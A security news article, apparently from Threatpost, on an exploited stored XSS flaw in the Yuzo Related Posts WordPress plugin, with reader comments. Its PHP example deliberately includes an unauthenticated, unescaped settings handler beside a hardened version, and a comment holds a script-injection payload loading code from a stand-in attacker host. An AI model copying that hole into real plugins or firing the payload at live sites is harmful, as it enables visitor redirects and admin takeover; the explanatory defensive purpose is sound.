Users Urged to Uninstall WordPress Yuzo Plugin After Flaw Exploited


A vulnerability in the Yuzo Related Posts WordPress plugin, used by 60,000 websites, is being exploited in the wild.

UPDATE

Users of the popular Yuzo Related Posts plugin are being urged to uninstall the plugin after a flaw was discovered being exploited in the wild – putting tens of thousands of websites at risk.

Yuzo Related Posts, which lets WordPress sites display a “related posts” section, is installed on more than 60,000 websites. A cross-site scripting flaw recently disclosed in the plugin could be used to deface sites, redirect visitors to malicious websites or compromise WordPress administrator accounts, among other things.

That vulnerability is now being exploited in the wild, warned Dan Moen with Wordfence in a Wednesday post: “The vulnerability, which allows stored cross-site scripting (XSS), is now being exploited in the wild. These attacks appear to be linked to the same threat actor who targeted the recent Social Warfare and Easy WP SMTP vulnerabilities.”

The plugin was removed from the WordPress plugin directory on March 30 after a security researcher publicly and “irresponsibly” disclosed an unpatched vulnerability in the plugin that day, researchers with Wordfence said.

The support team for Yuzo Related Posts told Threatpost that it recommends users uninstall the plugin immediately until an update becomes available.

Automattic, the company behind WordPress.com, did not immediately respond to a request for comment from Threatpost.

Moen said that the flaw stems from missing authentication checks in the plugin; specifically, the code path in charge of storing the plugin’s settings in the database did not verify who was making the request.

Because those stored settings are later rendered into the site’s HTML as markup rather than as escaped text, an unauthenticated attacker can inject malicious content into them. A JavaScript payload written into the settings is inserted into the plugin’s HTML templates and executed by the browser of every visitor to the compromised website, researchers said.
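The two defects Moen describes, a settings-save path reachable without authentication and settings echoed into the page as markup, are easiest to see side by side in code. The following is an added illustration written for this article, not Yuzo’s own code: a minimal WordPress plugin fragment showing the vulnerable pattern and a hardened version. The `rp_` function names, the `rp_custom_css` option and the `rp_save_settings` nonce action are hypothetical; the WordPress functions called (`update_option`, `current_user_can`, `check_admin_referer`, `wp_unslash`, `wp_strip_all_tags`) are the real core API.

```php
<?php
/*
 * Added illustration for this article, not Yuzo's code.  Names prefixed
 * "rp_", the option "rp_custom_css" and the nonce action "rp_save_settings"
 * are hypothetical; the WordPress functions used are the real core API.
 */

/* ---------- Vulnerable pattern: the two defects described above ---------- */

// Defect 1: hooked to 'init', so it runs for every request by every visitor,
// and it checks neither a capability nor a nonce.  Any unauthenticated POST
// that carries the field is written straight into wp_options.
function rp_vulnerable_save_settings() {
    if ( isset( $_POST['rp_custom_css'] ) ) {
        update_option( 'rp_custom_css', wp_unslash( $_POST['rp_custom_css'] ) );
    }
}
add_action( 'init', 'rp_vulnerable_save_settings' );

// Defect 2: the stored value is echoed into the page as markup.  A value such as
//   </style><script src="https://attacker.example/r.js"></script><style>
// closes the style element and runs the script in every visitor's browser,
// which is how a payload in "settings" becomes a site-wide redirect.
function rp_vulnerable_print_styles() {
    echo '<style>' . get_option( 'rp_custom_css', '' ) . '</style>';
}
add_action( 'wp_head', 'rp_vulnerable_print_styles' );

/* ---------- Hardened pattern ---------- */

function rp_secure_save_settings() {
    if ( ! isset( $_POST['rp_custom_css'] ) ) {
        return;
    }
    // Authorisation: only users allowed to manage options may change settings.
    // This is the check that actually closes the hole; a nonce alone is not an
    // authorisation control, since any logged-in user can obtain one.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions', '', array( 'response' => 403 ) );
    }
    // CSRF: the form must carry the nonce from wp_nonce_field( 'rp_save_settings' ).
    check_admin_referer( 'rp_save_settings' );
    // Sanitise on input: CSS is plain text, so drop any tag-like content.
    $css = wp_strip_all_tags( wp_unslash( $_POST['rp_custom_css'] ) );
    update_option( 'rp_custom_css', $css );
}
// Hooked to 'admin_init' so the save path is not reachable from front-end
// requests at all; the capability check above is still required, because
// low-privilege users can reach admin pages too.
add_action( 'admin_init', 'rp_secure_save_settings' );

function rp_secure_print_styles() {
    $css = get_option( 'rp_custom_css', '' );
    if ( '' === $css ) {
        return;
    }
    // Escape on output as well: inside <style> the breakout token is "</style",
    // so strip tags again rather than trusting whatever reached the database.
    // (WordPress core's own Additional CSS output takes the same approach.)
    echo '<style>' . wp_strip_all_tags( $css ) . '</style>';
}
add_action( 'wp_head', 'rp_secure_print_styles' );
```

The hardened handler applies the three checks WordPress expects of any code that writes settings: a capability check, a nonce check and input sanitization. It also hooks `admin_init` instead of `init` so that the save path is never reachable from a public page request, and it strips tags on output as well as on input, because an option can be modified by other routes (a compromised database, another plugin) and the rendering code should not assume the stored value is clean.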

On Wednesday, 11 days after the disclosure, researchers found the flaw under active exploitation, with websites running the plugin being attacked.

Several organizations running the plugin on their WordPress sites, such as ManaJournal, said that as a result of the exploitation their visitors were being redirected to malicious websites.

Other plugin users took to WordPress.org, an open source project that is separate from WordPress.com, to share their own experiences with the plugin.

One user, who said her website was “sort of hacked because of this plugin,” said: “I regret that the developers did not even take the effort to inform the users about this (with an update stating: no longer safe, or something).”

Researchers linked this latest attack to a separate WordPress plugin exploit in March: the Social Warfare plugin was also affected by a stored cross-site scripting vulnerability that was being exploited in the wild. That incident followed a separate vulnerability, disclosed and patched in another WordPress plugin, Easy WP SMTP, which was likewise under active attack and was being exploited to take administrative control of affected sites, researchers said.

Third-party plugins continue to be an Achilles’ heel for WordPress security. According to a January Imperva report, almost all (98 percent) of WordPress vulnerabilities are related to plugins that extend the functionality and features of a website or blog.

“Vulnerabilities in WordPress plugins have been a long-standing problem,” Chris Orr, systems engineer at Tripwire, said in an email. “The plug-in directory is very much like the Google Play store where vetting of apps is a major weakness. Lack of notifications by the plug-in developer is also an issue to contend with. It is recommended that WordPress users either automatically update the platform and their apps or pay close attention to the ones they use and how they behave and keep an eye out for vulnerabilities.”


This article was updated on April 12 at 1:46 p.m. to clarify that WordPress.org, erroneously described in a previous version of the article as a “support site” for WordPress.com, is an open source project that is separate from WordPress.com. 


Discussion

  • Andrew on

    I got comments that my site was redirecting to spam yesterday and went crazy trying to figure out what was going on. Security scans didn't find anything. I ended up paying way too much for one of the premium cleanup services and after that was done, the site was still redirecting! After I Googled the url it was redirecting to I found a couple of articles and eventually this one. Deleted the Yuzo plugin immediately. So now I'm happy my site is healthy, but upset I wasted money on a service that didn't do anything!
  • Plugin Vulnerabilities on

    We are the service provider mentioned in your post, though incorrectly referred to as a "security researcher"; our name is Plugin Vulnerabilities. We monitor the closure of popular WordPress plugins as that can indicate there is a security vulnerability in them that caused the removal, and then if we find any, we warn our customers since that is what they pay us to do, as well as the public at large. By comparison the company you are mentioning only warns people after the vulnerabilities have been widely exploited, which obviously doesn't do people much good. Maybe it would be better to cite the original source, instead of a company that looks to be interested in leaving people vulnerable to being hacked instead of letting people take action before they can be exploited. We only came across the plugin because it was closed, so nothing we did could have caused it to be closed; for some reason your source is claiming otherwise.
  • Ahmed on

    [A question for Wordfence:] Can you please share your PoC paper where you highlighted the vulnerabilities or its for your paid members only?
